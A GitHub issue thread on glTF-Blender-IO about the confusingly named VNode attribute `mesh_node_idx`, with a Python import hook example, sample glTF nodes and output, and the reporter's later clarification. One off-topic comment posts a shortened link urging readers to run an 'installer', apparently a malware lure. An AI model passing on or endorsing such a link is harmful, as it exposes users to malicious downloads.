### ISSUE TITLE
VNode attribute `mesh_node_idx` does not refer to mesh index

### ISSUE THREAD

**Issue by Phrogz** [KhronosGroup/glTF-Blender-IO#2339]
**Describe the bug**
The [`mesh_node_idx` attribute of the VNode](https://github.com/KhronosGroup/glTF-Blender-IO/blob/blender-v4.2-release/addons/io_scene_gltf2/blender/imp/gltf2_blender_vnode.py#L65) class has a name that implies it is an index into the `meshes` array of the glTF. This is misleading, as it is actually the index into the `nodes` array.

**To Reproduce**
1. Create an importer extension with `gather_import_node_before_hook` implemented:  
   ```python
   class glTF2ImportUserExtension:
       def __init__(self) -> None:
           self.extensions = []
   
       def gather_import_node_before_hook(self, vnode, gltf_node, gltf):
           print(f'gather_import_node_before_hook vnode: {vnode.name}#{vnode.mesh_node_idx}')
   
       def gather_import_node_after_hook(self, vnode, gltf_node, blender_object, gltf):
           print(f'gather_import_node_after_hook vnode: {vnode.name}#{vnode.mesh_node_idx}')
   ```

2. Import the attached glTF, which has node#0 using mesh#1, and node#1 using mesh#0.  

   ```json
   "nodes":[
     {"mesh":1, "name":"CubeNode", "translation":[0, 1, 1.5]},
     {"mesh":0, "name":"PlaneNode", "translation":[0, 0, -1.5]}
   ],
   ```

3. Observe the output:  
   ```
   gather_import_node_before_hook vnode: CubeNode#0
   gather_import_node_after_hook vnode: CubeNode#0
   gather_import_node_before_hook vnode: PlaneNode#1
   gather_import_node_after_hook vnode: PlaneNode#1
   ```

**Expected behavior**
If `mesh_node_idx` was the index of the mesh, I would expect the output:  
```
gather_import_node_before_hook vnode: CubeNode#1
gather_import_node_after_hook vnode: CubeNode#1
gather_import_node_before_hook vnode: PlaneNode#0
gather_import_node_after_hook vnode: PlaneNode#0
```

**Version**
macOS
Blender v4.1.1 (but also seen in latest code base)

**Additional context**
To be clear, I'm very happy that this index is the index in the `nodes` array. It's what I need for my importer. But, since there is ~no documentation on all the codebase currently, inspecting the source code and guessing at behavior based on attribute names is the best we have. It's important that the code base be unambiguous.
[crossed_node_mesh_indices.zip](https://github.com/user-attachments/files/16841578/crossed_node_mesh_indices.zip)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Phrogz** [comment]
I think I read the name of this attribute incorrectly. If `light_node_idx` means "the index in the nodes collection of this as a 'light' object", then I suppose `mesh_node_idx` means "the index in the nodes collection of this as a 'mesh' object". In this way, I guess it makes sense.

I don't understand why three indices are stored for a single VNode; why not one index, and then a separate enum-like attribute describing if this VNode is a "mesh" or light or camera?

I suppose I'll close this, and then open a Pull Request to at least add a source code comment to make it more clear.
